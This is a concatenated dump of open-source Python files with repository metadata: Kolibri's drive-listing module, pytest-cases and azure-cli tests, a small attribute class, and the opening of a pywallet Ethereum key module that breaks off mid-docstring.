print('TypeError')
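# Illustrative expected results for a few of the cases above (not part of the original
# test file); each starts from x = list(range(10)):
# l[1:3] = [10, 20]  ->  [0, 10, 20, 3, 4, 5, 6, 7, 8, 9]
# l[:-3] = [10, 20]  ->  [10, 20, 7, 8, 9]
# del l[:-3]         ->  [7, 8, 9]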
|
2bb37a82962a57a0e65c4e35a4c80d8264a9f5d6
|
df87814cb32990ad8c27d0b13a821aabce012819
|
/kolibri/core/discovery/utils/filesystem/posix.py
|
64d1b91e2d766a237aaaacf1ebae0322ace7addf
|
[
"MIT"
] |
permissive
|
learningequality/kolibri
|
26812d4ae771f3b389d3317a586bc032fc84866b
|
cc9da2a6acd139acac3cd71c4cb05c15d4465712
|
refs/heads/release-v0.16.x
| 2023-09-01T18:07:29.720772
| 2023-08-31T15:43:47
| 2023-08-31T15:43:47
| 49,976,939
| 689
| 682
|
MIT
| 2023-09-14T20:02:29
| 2016-01-19T19:22:07
|
Python
|
UTF-8
|
Python
| false
| false
| 9,838
|
py
|
posix.py
|
import logging
import os
import re
import shutil
import subprocess
import sys
from .constants import drivetypes
from kolibri.utils.android import on_android
logger = logging.getLogger(__name__)
# Regex parser for the output of `mount` on OSX, which contains rows that look like:
# /dev/disk1s1 on /Volumes/HP v125w (msdos, local, nodev, nosuid, noowners)
OSX_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) on (?P<path>.+) \((?P<filesystem>[^, ]+)", flags=re.MULTILINE
)
# Regex parser for the output of `mount` on Linux, which contains rows that look like:
# /dev/sdb2 on /media/user/KEEPOD type ext4 (rw,nosuid,nodev,uhelper=udisks2)
LINUX_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) on (?P<path>.+) type (?P<filesystem>\S+)", flags=re.MULTILINE
)
# Regex parser for the output of 'mount' on Android, which contains rows that look like:
# /dev/block/bootdevice/by-name/userdata /data ext4 rw,seclabel,nosuid,nodev,noatime,noauto_da_alloc,data=ordered 0 0
# Note that access to /proc/ is restricted in later versions of Android, which will break the app.
RAW_MOUNT_PARSER = re.compile(
r"^(?P<device>\S+) (?P<path>\S+) (?P<filesystem>\S+)", flags=re.MULTILINE
)
FILESYSTEM_BLACKLIST = set(
[
"anon_inodefs",
"bdev",
"binfmt_misc",
"cgroup",
"cpuset",
"debugfs",
"devpts",
"devtmpfs",
"ecryptfs",
"fuse",
"fuse.gvfsd-fuse",
"fuse.portal",
"fusectl",
"hugetlbfs",
"mqueue",
"nfs",
"nfs4",
"nfsd",
"pipefs",
"proc",
"pstore",
"ramfs",
"rootfs",
"rpc_pipefs",
"securityfs",
"sockfs",
"sysfs",
"tmpfs",
"cgmfs",
]
)
# These paths can be mounted as separate drives/partitions,
# so they should not be shown in the list of import/export drives.
PATH_PREFIX_BLACKLIST = ["/proc", "/sys", "/tmp", "/var", "/boot", "/dev"]
def get_drive_list():
"""
Gets a list of drives and metadata by parsing the output of `mount`, and adding additional info from various commands.
Disk size/usage comes from shutil.disk_usage or os.statvfs, and name/type info from dbus (Linux) or diskutil (OSX).
"""
if sys.platform == "darwin":
MOUNT_PARSER = OSX_MOUNT_PARSER
else:
MOUNT_PARSER = LINUX_MOUNT_PARSER
try:
drivelist = subprocess.Popen("mount", shell=True, stdout=subprocess.PIPE)
drivelisto, err = drivelist.communicate()
# Some Android devices at least now use the LINUX_MOUNT_PARSER format.
# Try it and revert to RAW_MOUNT_PARSER if we can't find any matches with it.
if on_android() and not MOUNT_PARSER.match(drivelisto.decode()):
MOUNT_PARSER = RAW_MOUNT_PARSER
except OSError: # couldn't run `mount`, let's try reading the /proc/mounts listing directly
with open("/proc/mounts") as f:
drivelisto = f.read()
MOUNT_PARSER = RAW_MOUNT_PARSER
drives = []
for drivematch in MOUNT_PARSER.finditer(drivelisto.decode()):
drive = drivematch.groupdict()
path = (
drive["path"]
.replace("\\040", " ")
.replace("\\011", "\t")
.replace("\\012", "\n")
.replace("\\134", "\\")
)
# skip the drive if the filesystem or path is in a blacklist
if drive["filesystem"] in FILESYSTEM_BLACKLIST or any(
path.startswith(p) for p in PATH_PREFIX_BLACKLIST
):
logger.debug("Skipping blacklisted drive '{}'".format(path))
continue
# skip if we don't have read access to the drive
if not os.access(path, os.R_OK):
continue
# attempt to get some additional metadata about the drive
try:
usage = _get_drive_usage(path)
except OSError:
# skip if we don't have access to get drive usage
continue
dbus_drive_info = _try_to_get_drive_info_from_dbus(drive["device"])
diskutil_info = _try_to_get_drive_info_from_diskutil(drive["device"])
# combine the various metadata sources to construct the overall drive metadata
drives.append(
{
"path": path,
"name": dbus_drive_info.get("name")
or diskutil_info.get("name")
or path,
"filesystem": drive["filesystem"],
"freespace": usage["free"],
"totalspace": usage["total"],
"drivetype": dbus_drive_info.get("drivetype")
or diskutil_info.get("drivetype")
or "",
"guid": dbus_drive_info.get("guid")
or diskutil_info.get("guid")
or drive["device"],
}
)
return drives
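# Illustrative sketch (not part of the original file) of a single entry returned by
# get_drive_list(); all values below are hypothetical:
# {
#     "path": "/media/user/KEEPOD",
#     "name": "KEEPOD",
#     "filesystem": "ext4",
#     "freespace": 3221225472,
#     "totalspace": 16008609792,
#     "drivetype": drivetypes.USB_DEVICE,  # a drivetypes constant, or "" if unknown
#     "guid": "9C33-6BBC",
# }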
def _get_drive_usage(path):
"""
Use Python libraries to get drive space/usage statistics. Prior to v3.3, use `os.statvfs`;
on v3.3+, use the more accurate `shutil.disk_usage`.
"""
if sys.version_info >= (3, 3):
usage = shutil.disk_usage(path)
return {"total": usage.total, "used": usage.used, "free": usage.free}
if on_android():
from jnius import autoclass
StatFs = autoclass("android.os.StatFs")
AndroidString = autoclass("java.lang.String")
stats = StatFs(AndroidString(path))
return {
"total": stats.getBlockCountLong() * stats.getBlockSizeLong(),
"free": stats.getAvailableBlocksLong() * stats.getBlockSizeLong(),
}
# with os.statvfs, we need to multiply block sizes by block counts to get bytes
stats = os.statvfs(path)
total = stats.f_frsize * stats.f_blocks
free = stats.f_frsize * stats.f_bavail
return {"total": total, "free": free, "used": total - free}
def _try_to_get_drive_info_from_dbus(device):
"""
One of the only ways to access a lot of useful information about drives, without requiring root/sudo,
is through DBUS. The Python library for DBUS is not always installed, but use it if available.
"""
# ensure the device is under /dev, and extract the block device name
path_components = os.path.split(device)
if path_components[0] != "/dev":
return {}
block_device_name = path_components[-1]
# try importing dbus, and exit gracefully if it fails
try:
import dbus
except ImportError:
return {}
try:
bus = dbus.SystemBus()
# get the block object based on the block device name
block_obj = bus.get_object(
"org.freedesktop.UDisks2",
"/org/freedesktop/UDisks2/block_devices/" + block_device_name,
)
block_iface = dbus.Interface(block_obj, "org.freedesktop.DBus.Properties")
block = block_iface.GetAll("org.freedesktop.UDisks2.Block")
# get the drive object, based on the drive identifier from the block object
drive_path = block.get("Drive")
drive_obj = bus.get_object("org.freedesktop.UDisks2", drive_path)
drive_iface = dbus.Interface(drive_obj, "org.freedesktop.DBus.Properties")
drive = drive_iface.GetAll("org.freedesktop.UDisks2.Drive")
# extract the name and guid from the block and drive properties, calculate drivetype, and return
return {
"name": str(
block.get("IdLabel")
or " ".join([drive.get("Vendor"), drive.get("Model")]).strip()
),
"guid": str(block.get("IdUUID") or drive.get("Serial") or drive.get("Id")),
"drivetype": _get_drivetype_from_dbus_drive_properties(drive),
}
except ValueError:
return {}
except dbus.exceptions.DBusException:
return {}
def _get_drivetype_from_dbus_drive_properties(drive_props):
"""
Read the block and drive properties from dbus drive props object to determine our best guess at the drive type.
"""
if (
drive_props.get("ConnectionBus") == "sdio"
or drive_props.get("Media") == "flash_sd"
):
return drivetypes.SD_CARD
if drive_props.get("ConnectionBus") == "usb" or drive_props.get("Media") == "thumb":
return drivetypes.USB_DEVICE
if drive_props.get("Optical"):
return drivetypes.OPTICAL_DRIVE
if drive_props.get("Removable") or drive_props.get("MediaRemovable"):
return drivetypes.USB_DEVICE
return drivetypes.UNKNOWN
def _try_to_get_drive_info_from_diskutil(device):
"""
On OSX, the best way to get disk info is with `diskutil`.
"""
# we only use diskutil on OSX
if sys.platform != "darwin":
return {}
# skip non-device mounts
if not device.startswith("/dev/"):
return {}
# run the command and read the results
diskutilp = subprocess.Popen(
"diskutil info {}".format(device), shell=True, stdout=subprocess.PIPE
)
diskutil_output, err = diskutilp.communicate()
rows = [
line.split(":", 1)
for line in diskutil_output.decode().split("\n")
if ":" in line
]
metadata = dict([(key.strip(), val.strip()) for key, val in rows])
# determine what type of drive it is (not sure what an optical drive shows up as, but OSX + optical is now uncommon)
if metadata.get("Protocol") == "USB":
drivetype = drivetypes.USB_DEVICE
elif metadata.get("Internal") == "Yes":
drivetype = drivetypes.INTERNAL_DRIVE
else:
drivetype = drivetypes.UNKNOWN
# extract the name and guid from the diskutil drive metadata, and return
return {
"drivetype": drivetype,
"name": metadata.get("Volume Name")
or metadata.get("Device / Media Name")
or "",
"guid": metadata.get("Volume UUID") or "",
}
|
c0ec6c105921ec8300c801a92310da726c3aba73
|
c29eba01ce299ebb27b886a83e19e59add7e2f6b
|
/tests/cases/doc/test_get_current_cases.py
|
2a1e3aaa03d1fddb607fe32a4ff3c9f7aeee901a
|
[
"BSD-3-Clause"
] |
permissive
|
smarie/python-pytest-cases
|
e87516e73d5067d5c307c7fdb37cc5f1f97c417e
|
ab3b7190d728b18512141b9f5f3a1c3dfc7cedf2
|
refs/heads/main
| 2023-07-08T11:41:57.278697
| 2023-02-23T13:11:25
| 2023-02-23T13:11:25
| 138,296,136
| 286
| 40
|
BSD-3-Clause
| 2023-07-03T14:57:02
| 2018-06-22T11:42:19
|
Python
|
UTF-8
|
Python
| false
| false
| 9,058
|
py
|
test_get_current_cases.py
|
# Authors: Sylvain MARIE <sylvain.marie@se.com>
# + All contributors to <https://github.com/smarie/python-pytest-cases>
#
# License: 3-clause BSD, <https://github.com/smarie/python-pytest-cases/blob/master/LICENSE>
from pytest_cases import parametrize_with_cases, fixture, case, filters, get_current_cases
from . import test_get_current_cases_cases as casesfile
from pytest_cases.common_pytest_marks import PYTEST3_OR_GREATER
@case(tags=("no_fix_needed",))
def case_a():
return 1, 2
@case(tags=("no_fix_needed",))
def case_b():
return 1, 2
@case(id="custom_id", tags=("no_fix_needed",))
def tuplecase_a():
return 1, 2
@case(id="custom_id")
def case_a_fixture(request):
return 1, 2
def tuplecase_a_fixture(request):
return 1, 2
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_local_cases(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2,
current_cases, request):
# also try with a late call, just to be sure that a cache would not prevent us from accessing the lazy value getters
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct, local=True)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_separate_cases_file(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2,
current_cases, request):
# also try with a late call, just to be sure that a cache would not prevent us from accessing the lazy value getters
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct, local=False)
def _assert_cases(current_cases, local=True):
ref_dict = {
'a': case_a if local else casesfile.case_a,
'b': case_b if local else casesfile.case_b
}
assert len(current_cases["purelazy_a"]) == 3
assert current_cases["purelazy_a"][1] is ref_dict[current_cases["purelazy_a"][0]]
assert current_cases["purelazy_a"][2] == {}
assert len(current_cases["purelazy_t1"]) == 3
assert current_cases["purelazy_t1"][0] == "custom_id"
assert current_cases["purelazy_t1"][1] is (tuplecase_a if local else casesfile.tuplecase_a)
assert current_cases["purelazy_t1"][2] == {}
assert current_cases["purelazy_t1"] == current_cases["purelazy_t2"]
ref_dict = {
'a': case_a if local else casesfile.case_a,
'b': case_b if local else casesfile.case_b,
'custom_id': case_a_fixture if local else casesfile.case_a_fixture
}
assert len(current_cases["withfixrefs_f"]) == 3
assert current_cases["withfixrefs_f"][1] is ref_dict[current_cases["withfixrefs_f"][0]]
assert current_cases["withfixrefs_f"][2] == {}
ref_dict = {
'custom_id': tuplecase_a if local else casesfile.tuplecase_a,
"a_fixture": tuplecase_a_fixture if local else casesfile.tuplecase_a_fixture
}
assert len(current_cases["withfixrefs_f1"]) == 3
assert current_cases["withfixrefs_f1"][1] is ref_dict[current_cases["withfixrefs_f1"][0]]
assert current_cases["withfixrefs_f2"] == current_cases["withfixrefs_f1"]
if PYTEST3_OR_GREATER:
@fixture
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
def my_fixture_local(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_local"
}
_assert_cases(cases_dct, local=True)
assert set(cases_dct["my_fixture_local"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_local"], local=True)
@fixture
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def my_fixture_separate_file(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_separate_file"
}
_assert_cases(cases_dct, local=False)
assert set(cases_dct["my_fixture_separate_file"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_separate_file"], local=False)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", cases=".", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", cases=".", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", cases=".", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", cases=".", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_local_cases_with_fix(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, my_fixture_local, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_local"
}
_assert_cases(cases_dct, local=True)
assert set(cases_dct["my_fixture_local"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_local"], local=True)
@parametrize_with_cases("withfixrefs_f1,withfixrefs_f2", prefix="tuplecase_")
@parametrize_with_cases("withfixrefs_f", prefix="case_")
@parametrize_with_cases("purelazy_t1,purelazy_t2", prefix="tuplecase_", filter=filters.has_tags("no_fix_needed"))
@parametrize_with_cases("purelazy_a", prefix="case_", filter=filters.has_tags("no_fix_needed"))
def test_separate_cases_file_with_fix(purelazy_a, purelazy_t1, purelazy_t2, withfixrefs_f, withfixrefs_f1, withfixrefs_f2, my_fixture_separate_file, current_cases, request):
late_call_dct = get_current_cases(request)
for cases_dct in (current_cases, late_call_dct):
assert set(cases_dct.keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2",
# NEW: the fixture
"my_fixture_separate_file"
}
_assert_cases(cases_dct, local=False)
assert set(cases_dct["my_fixture_separate_file"].keys()) == {
"purelazy_a", "purelazy_t1", "purelazy_t2", "withfixrefs_f", "withfixrefs_f1", "withfixrefs_f2"
}
_assert_cases(cases_dct["my_fixture_separate_file"], local=False)
|
6e82c5ec1811060133dfc18258a74c22ae880a1c
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_api_check.py
|
6a74af36cf2d913f5a2a99434879bd565ddc625e
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 5,190
|
py
|
test_api_check.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import unittest
from unittest.mock import MagicMock
from knack.util import CLIError
from azure.cli.command_modules.resource.custom import (_ResourceUtils, _validate_resource_inputs,
parse_resource_id)
class TestApiCheck(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
pass
def tearDown(self):
pass
def test_parse_resource(self):
parts = parse_resource_id('/subscriptions/00000/resourcegroups/bocconitestlabrg138089/'
'providers/microsoft.devtestlab/labs/bocconitestlab/'
'virtualmachines/tasktest1')
self.assertIsNotNone(parts.get('type'))
def test_parse_resource_capital(self):
parts = parse_resource_id('/subscriptions/00000/resourceGroups/bocconitestlabrg138089/'
'providers/microsoft.devtestlab/labs/bocconitestlab/'
'virtualmachines/tasktest1')
self.assertIsNotNone(parts.get('type'))
def test_validate_resource_inputs(self):
self.assertRaises(CLIError, _validate_resource_inputs, None, None, None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', None, None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', 'b', None, None)
self.assertRaises(CLIError, _validate_resource_inputs, 'a', 'b', 'c', None)
_validate_resource_inputs('a', 'b', 'c', 'd')
def test_resolve_api_provider_backup(self):
# Verifies provider is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/test', resource_name='vnet1',
resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2016-01-01")
def test_resolve_api_provider_with_parent_backup(self):
# Verifies provider (with parent) is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, parent_resource_path='foo/testfoo123', resource_group_name='rg',
resource_provider_namespace='Mock', resource_type='test',
resource_name='vnet1',
rcf=rcf)
self.assertEqual(res_utils.api_version, "1999-01-01")
def test_resolve_api_all_previews(self):
# Verifies most recent preview version returned only if there are no non-preview versions.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/preview', resource_name='vnet1',
resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2005-01-01-preview")
def test_resolve_api_provider_latest_include_preview(self):
# Verifies provider is used as backup if api-version not specified.
from azure.cli.core.mock import DummyCli
cli = DummyCli()
rcf = self._get_mock_client()
res_utils = _ResourceUtils(cli, resource_type='Mock/test_latest', resource_name='vnet1',
resource_group_name='rg', rcf=rcf)
self.assertEqual(res_utils.api_version, "2015-01-01")
res_utils = _ResourceUtils(cli, resource_type='Mock/test_latest', resource_name='vnet1',
resource_group_name='rg', rcf=rcf, latest_include_preview=True)
self.assertEqual(res_utils.api_version, "2016-01-01-preview")
def _get_mock_client(self):
client = MagicMock()
provider = MagicMock()
provider.resource_types = [
self._get_mock_resource_type('skip', ['2000-01-01-preview', '2000-01-01']),
self._get_mock_resource_type('test', ['2016-01-01-preview', '2016-01-01']),
self._get_mock_resource_type('foo', ['1999-01-01-preview', '1999-01-01']),
self._get_mock_resource_type('preview', ['2005-01-01-preview', '2004-01-01-preview']),
self._get_mock_resource_type('test_latest', ['2016-01-01-preview', '2015-01-01'])
]
client.providers.get.return_value = provider
return client
def _get_mock_resource_type(self, name, api_versions): # pylint: disable=no-self-use
rt = MagicMock()
rt.resource_type = name
rt.api_versions = api_versions
return rt
if __name__ == '__main__':
unittest.main()
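# --- Illustrative sketch (not part of the original file, and not the actual azure-cli
# implementation): the behaviour these tests assert amounts to "pick the newest
# non-preview api-version, falling back to the newest preview version, and include
# previews when latest_include_preview is set". A minimal standalone version of that rule:
#
# def pick_api_version(api_versions, latest_include_preview=False):
#     if not latest_include_preview:
#         stable = [v for v in api_versions if "preview" not in v]
#         if stable:
#             return sorted(stable)[-1]
#     return sorted(api_versions)[-1]
#
# pick_api_version(['2016-01-01-preview', '2016-01-01'])            # '2016-01-01'
# pick_api_version(['2005-01-01-preview', '2004-01-01-preview'])    # '2005-01-01-preview'
# pick_api_version(['2016-01-01-preview', '2015-01-01'], True)      # '2016-01-01-preview'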
|
dcd1490f66297369bc3ab7b17aa223a8bc789811
|
025401acb1f040d0fffe94b2306e5ed899b773bc
|
/data_structures/attribute.py
|
64fb6c33cca38376671eb4e171186e4535ddf44c
|
[
"MIT"
] |
permissive
|
alipsgh/tornado
|
02f19a838d3136d39d662c4d48403fdb98ce7974
|
f5a2a46a1b0882a91613ab9a635008808a7d37dd
|
refs/heads/master
| 2022-08-07T11:16:17.146885
| 2022-08-02T22:05:11
| 2022-08-02T22:05:11
| 102,551,348
| 129
| 37
|
MIT
| 2022-08-02T22:05:13
| 2017-09-06T02:09:14
|
Python
|
UTF-8
|
Python
| false
| false
| 615
|
py
|
attribute.py
|
class Attribute:
def __init__(self):
self.NAME = None
self.TYPE = None
self.POSSIBLE_VALUES = []
self.MAXIMUM_VALUE = None
self.MINIMUM_VALUE = None
def set_name(self, attr_name):
self.NAME = attr_name
def set_type(self, attr_type):
self.TYPE = attr_type
def set_possible_values(self, attr_possible_values):
self.POSSIBLE_VALUES = attr_possible_values
def set_bounds_values(self, attr_min_value, attr_max_value):
self.MINIMUM_VALUE = attr_min_value
self.MAXIMUM_VALUE = attr_max_value
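# Illustrative usage sketch (not part of the original file); the attribute name and
# type label below are hypothetical:
# attr = Attribute()
# attr.set_name('temperature')
# attr.set_type('numeric')
# attr.set_bounds_values(-10.0, 45.0)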
|
fd132cd2443af5b9a66775b0e1854482f86045e6
|
2c9a0463dcd7c88623bedf94dbfa3b33f2830783
|
/pywallet/utils/ethereum.py
|
2541052ddd5915aebf600084217935f69b7fc178
|
[
"MIT"
] |
permissive
|
ranaroussi/pywallet
|
dea3a23b5f9c2631120811eb307582b512883d94
|
468622dcf993a27a5b585289b2724986c02a1fbc
|
refs/heads/master
| 2023-04-11T05:48:46.160948
| 2019-11-09T14:32:13
| 2019-11-09T14:32:13
| 111,648,229
| 432
| 199
|
MIT
| 2023-03-16T08:54:02
| 2017-11-22T07:02:29
|
Python
|
UTF-8
|
Python
| false
| false
| 55,603
|
py
|
ethereum.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Code from:
https://github.com/michailbrynard/ethereum-bip44-python
This submodule provides the PublicKey, PrivateKey, and Signature classes.
It also provides HDPublicKey and HDPrivateKey classes for working with HD
wallets."""
import math
import base58
import base64
import binascii
import hashlib
import hmac
from mnemonic.mnemonic import Mnemonic
import random
from two1.bitcoin.utils import bytes_to_str
from two1.bitcoin.utils import address_to_key_hash
from two1.bitcoin.utils import rand_bytes
from two1.crypto.ecdsa_base import Point
from two1.crypto.ecdsa import ECPointAffine
from two1.crypto.ecdsa import secp256k1
bitcoin_curve = secp256k1()
from Crypto.Hash import keccak
sha3_256 = lambda x: keccak.new(digest_bits=256, data=x)
def sha3(seed):
return sha3_256(seed).digest()
def get_bytes(s):
"""Returns the byte representation of a hex- or byte-string."""
if isinstance(s, bytes):
b = s
elif isinstance(s, str):
b = bytes.fromhex(s)
else:
raise TypeError("s must be either 'bytes' or 'str'!")
return b
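# Illustrative examples (not part of the original file):
# get_bytes('00ff') == b'\x00\xff'        # hex string decoded to bytes
# get_bytes(b'\x00\xff') == b'\x00\xff'   # bytes passed through unchanged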
class PrivateKeyBase(object):
""" Base class for both PrivateKey and HDPrivateKey.
As this class is a base class it should not be used directly.
Args:
k (int): The private key.
Returns:
PrivateKey: The object representing the private key.
"""
@staticmethod
def from_b58check(private_key):
""" Decodes a Base58Check encoded private-key.
Args:
private_key (str): A Base58Check encoded private key.
Returns:
PrivateKey: A PrivateKey object
"""
raise NotImplementedError
def __init__(self, k):
self.key = k
self._public_key = None
@property
def public_key(self):
""" Returns the public key associated with this private key.
Returns:
PublicKey:
The PublicKey object that corresponds to this
private key.
"""
return self._public_key
def raw_sign(self, message, do_hash=True):
""" Signs message using this private key.
Args:
message (bytes): The message to be signed. If a string is
provided it is assumed the encoding is 'ascii' and
converted to bytes. If this is not the case, it is up
to the caller to convert the string to bytes
appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
ECPointAffine:
a raw point (r = pt.x, s = pt.y) which is
the signature.
"""
raise NotImplementedError
def sign(self, message, do_hash=True):
""" Signs message using this private key.
Note:
This differs from `raw_sign()` since it returns a
Signature object.
Args:
message (bytes or str): The message to be signed. If a
string is provided it is assumed the encoding is
'ascii' and converted to bytes. If this is not the
case, it is up to the caller to convert the string to
bytes appropriately and pass in the bytes.
do_hash (bool): True if the message should be hashed prior
to signing, False if not. This should always be left as
True except in special situations which require doing
the hash outside (e.g. handling Bitcoin bugs).
Returns:
Signature: The signature corresponding to message.
"""
raise NotImplementedError
def sign_bitcoin(self, message, compressed=False):
""" Signs a message using this private key such that it
is compatible with bitcoind, bx, and other Bitcoin
clients/nodes/utilities.
Note:
0x18 + b\"Bitcoin Signed Message:" + newline + len(message) is
prepended to the message before signing.
Args:
message (bytes or str): Message to be signed.
compressed (bool): True if the corresponding public key will be
used in compressed format. False if the uncompressed version
is used.
Returns:
bytes: A Base64-encoded byte string of the signed message.
The first byte of the encoded message contains information
about how to recover the public key. In bitcoind parlance,
this is the magic number containing the recovery ID and
whether or not the key was compressed or not. (This function
always processes full, uncompressed public-keys, so the magic
number will always be either 27 or 28).
"""
raise NotImplementedError
def to_b58check(self, testnet=False):
""" Generates a Base58Check encoding of this private key.
Returns:
str: A Base58Check encoded string representing the key.
"""
raise NotImplementedError
def to_hex(self):
""" Generates a hex encoding of the serialized key.
Returns:
str: A hex encoded string representing the key.
"""
return bytes_to_str(bytes(self))
def __bytes__(self):
raise NotImplementedError
def __int__(self):
raise NotImplementedError
class PublicKeyBase(object):
""" Base class for both PublicKey and HDPublicKey.
As this class is a base class it should not be used directly.
Args:
x (int): The x component of the public key point.
y (int): The y component of the public key point.
Returns:
PublicKey: The object representing the public key.
"""
@staticmethod
def from_bytes(key_bytes):
""" Generates a public key object from a byte (or hex) string.
Args:
key_bytes (bytes or str): A byte stream.
Returns:
PublicKey: A PublicKey object.
"""
raise NotImplementedError
@staticmethod
def from_private_key(private_key):
""" Generates a public key object from a PrivateKey object.
Args:
private_key (PrivateKey): The private key object from
which to derive this object.
Returns:
PublicKey: A PublicKey object.
"""
return private_key.public_key
def __init__(self):
pass
def hash160(self, compressed=True):
""" Return the RIPEMD-160 hash of the SHA-256 hash of the
public key.
Args:
compressed (bool): Whether or not the compressed key should
be used.
Returns:
bytes: RIPEMD-160 byte string.
"""
raise NotImplementedError
def address(self, compressed=True, testnet=False):
""" Address property that returns the Base58Check
encoded version of the HASH160.
Args:
compressed (bool): Whether or not the compressed key should
be used.
testnet (bool): Whether or not the key is intended for testnet
usage. False indicates mainnet usage.
Returns:
bytes: Base58Check encoded string
"""
raise NotImplementedError
def verify(self, message, signature, do_hash=True):
""" Verifies that message was appropriately signed.
Args:
message (bytes): The message to be verified.
